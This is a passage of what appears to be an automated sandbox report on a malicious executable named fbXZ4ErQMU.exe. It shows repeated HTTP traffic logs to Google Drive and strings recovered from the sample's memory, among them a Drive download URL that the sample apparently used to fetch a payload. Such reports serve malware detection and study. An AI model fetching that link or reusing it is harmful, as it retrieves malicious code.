AFiumC6Hli5MpzbTyXPRUc50JhgdOIvYUTYXTvjQPOSyqVyxNTMSJPpa6KQ0sF1R9oOu8gRVAN4Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:07:41 GMTContent-Security-Policy: script-src 'nonce-NQ1mB4Pom_oMhq1r8loscg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC5tu7iLH0MIabquVAm1oiHiYiUAw8jjJJWA8iLP5LesiPMDsfzydBghOKaqIxrCDRDkGv0Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:07:53 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-oyygR_8YGS3eMcbclErYPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6BQ1MhfXNBXfjOMJ5-AmjyT-KdBA-yMqsHQvIZLloZoeP6acx7CBlLRs_GCannUzI-3RqF1DL_egServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:08:04 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-MAt3ZcCFW0m5SGrwzXM6ag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7DRkY3tc8BWnqaPrzNJivplHHwe1Nq0lMHjG0FEHZZKH-BxrcQ8iP61oYnW1ELiPh-U35AZCH5NAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:08:15 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9vvGfA2HO0cqhM8DgDGgxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC662w_ozE6mpmBiQ0HZWLBYeBDxKsze3quUGohjbo3MMdfr9FMxgm_gxcn_H5H4_jqkgHPadg2x0gServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:08:26 GMTContent-Security-Policy: script-src 'nonce-7-03QxQb97E_Ufe9rc4Bng' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652X-GUploader-UploadID: AFiumC7dex4EYLaJpvfC7NMmr4MRAC3ru8U9uzOw3tNgwArQL5hqjc2gZbPwvPZhZ2QtrNM2zV4dQc2bkAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:08:37 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-uCoUTF2a_GYBEUlDdKGlcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7MbuDB0N3d-oWBCrkLsSpynXVdBlel4wPreBjqfrWKwsL2H50bEuga4RPOGT7GnNDJ1E4CqSmu4QServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:08:48 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SvCIib4xIIGOMaB8VGxvpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC53MR9wRBGHqPY0M1JN37EVuAwQFnIpEbFHzrUSqaPnpC6-dvrvXQ0Rdwx3NVSWIfmx40MServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:09:00 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-YHu4JF1huwsJQVHxQCU7gQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC4kktxTQnTKX-5zL0iksR_VI3daODD0HP2upn29js632xsopr-GLznrMLkEjE6vvYKUAsuHUbw9JQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 16:09:11 GMTContent-Security-Policy: script-src 'nonce-Z6Q_FmnFJaZSLffzj_ChMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6lK0iXxMxjMi6r9ogofdF2Zt-a6T6m6XJsjDQxQ_ve_aSxvSIsOqCEKQILNpwTMKXTMk8Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: fbXZ4ErQMU.exe, fbXZ4ErQMU.exe, 00000000.00000000.51418151882.000000000040A000.00000008.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000003.00000000.52634286184.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: fbXZ4ErQMU.exe, 00000000.00000000.51418151882.000000000040A000.00000008.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000003.00000000.52634286184.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1K_jGM8Q1zFs0po9MoqZxARRutfXGyjys&export=d
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726610810.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53506009888.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53176252546.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/0
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/8
      Source: fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/;
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/f
      Source: fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 